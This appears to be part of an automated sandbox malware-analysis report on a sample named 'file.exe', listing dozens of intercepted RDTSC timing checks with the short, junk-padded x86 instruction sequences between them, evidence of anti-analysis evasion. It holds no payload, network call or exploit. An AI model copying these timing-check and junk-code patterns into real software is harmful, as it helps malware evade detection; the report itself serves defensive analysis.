Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B5DD second address: C1B5F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B5F9 second address: C1B61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624B4E7D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007FF624B4E813h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624B4E7DAh 0x0000001b jbe 00007FF624B4E7D6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B782 second address: C1B788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B788 second address: C1B791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1C425 second address: C1C42B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1C42B second address: C1C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2133C second address: C21347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C21347 second address: C21394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624B4E7E9h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7DEh 0x00000012 jmp 00007FF624B4E7E7h 0x00000017 jg 00007FF624B4E7D6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C21394 second address: C213A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FF624C752F6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C213A4 second address: C213A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C21059 second address: C2105D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E7BC second address: C2E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E7C4 second address: C2E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3C087 second address: C3C096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007FF624B4E7D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F926 second address: C3F92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F92A second address: C3F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F92E second address: C3F954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF624C75314h 0x0000000c jmp 00007FF624C75308h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F954 second address: C3F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F958 second address: C3F95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59271 second address: C5927D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FF624B4E7D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5927D second address: C59293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59293 second address: C592B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58317 second address: C58323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58323 second address: C5832E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF624B4E7D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5832E second address: C58334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58334 second address: C58338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58338 second address: C58354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75302h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58354 second address: C5835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5835E second address: C5836A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5836A second address: C58374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BC28 second address: C5BC2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BCC0 second address: C5BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BCC8 second address: C5BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BF03 second address: C5BF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D450 second address: C5D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF624C75304h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FF624C75301h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D49A second address: C5D49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D49E second address: C5D4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EC9A second address: C5ECA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C800F0 second address: 4C800F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C800F4 second address: 4C801A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF624B4E7E4h 0x00000010 sbb esi, 457E0F98h 0x00000016 jmp 00007FF624B4E7DBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FF624B4E7E8h 0x00000022 or al, FFFFFFF8h 0x00000025 jmp 00007FF624B4E7DBh 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007FF624B4E7E8h 0x00000031 movzx eax, dx 0x00000034 pop edi 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov di, AA6Eh 0x0000003c mov esi, ebx 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FF624B4E7E1h 0x00000045 mov ebp, esp 0x00000047 jmp 00007FF624B4E7DEh 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FF624B4E7DDh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C801A9 second address: 4C801AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C801AE second address: 4C801BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60EE7 second address: 4C60EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60EF9 second address: 4C60EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60EFD second address: 4C60F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d jmp 00007FF624C752FFh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF624C752FBh 0x0000001f xor cl, FFFFFFDEh 0x00000022 jmp 00007FF624C75309h 0x00000027 popfd 0x00000028 mov dx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40100 second address: 4C40105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40105 second address: 4C40139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF624C752FDh 0x0000000a adc cl, FFFFFFD6h 0x0000000d jmp 00007FF624C75301h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dh, D5h 0x0000001c mov bx, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40139 second address: 4C401A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1CA73BC2h 0x00000008 mov ebx, 76B1520Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 movzx esi, di 0x00000015 jmp 00007FF624B4E7E7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FF624B4E7E6h 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF624B4E7E0h 0x00000028 push dword ptr [ebp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF624B4E7DAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401A0 second address: 4C401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401A4 second address: 4C401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401AA second address: 4C401E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FCh 0x00000009 and eax, 249DD548h 0x0000000f jmp 00007FF624C752FBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624C752FBh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401E1 second address: 4C401E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401E7 second address: 4C401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C401EB second address: 4C401EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4022E second address: 4C4023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4023E second address: 4C40242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40242 second address: 4C40257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C752FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40257 second address: 4C4025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CB0 second address: 4C60CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CB4 second address: 4C60CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60CB8 second address: 4C60CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60CBE second address: 4C60CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1D6ACFE1h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E4h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60822 second address: 4C6085C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624C75302h 0x00000013 add si, 9398h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606EC second address: 4C606F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606F0 second address: 4C60703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60703 second address: 4C60749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 920Ah 0x00000007 pushfd 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d adc eax, 565C98AEh 0x00000013 jmp 00007FF624B4E7E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624B4E7DDh 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60749 second address: 4C60776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C75303h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60776 second address: 4C60793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60793 second address: 4C607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C607A3 second address: 4C607A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C604A5 second address: 4C604B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7039E second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80488 second address: 4C804A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804A3 second address: 4C804CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF624B4E7DDh 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804CC second address: 4C804D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2612h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804D5 second address: 4C804F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E1h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804F4 second address: 4C804FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804FA second address: 4C80549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FF624B4E7DBh 0x0000000f xor si, AB6Eh 0x00000014 jmp 00007FF624B4E7E9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF624B4E7DDh 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80549 second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C75307h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80565 second address: 4C80575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bh, 99h 0x0000000d push esi 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80575 second address: 4C8058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75302h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60626 second address: 4C6062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6062A second address: 4C60645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60645 second address: 4C6066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 mov ah, F5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF624B4E7E5h 0x00000013 pop esi 0x00000014 mov dx, ACC4h 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6066E second address: 4C606AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF624C752FEh 0x00000012 movzx ecx, di 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 movzx ecx, dx 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF624C752FEh 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606AC second address: 4C606B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C606B2 second address: 4C606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80008 second address: 4C8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8000C second address: 4C80023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80023 second address: 4C80053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF624B4E7DAh 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624B4E7E0h 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80053 second address: 4C80062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80062 second address: 4C8007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 rdtsc
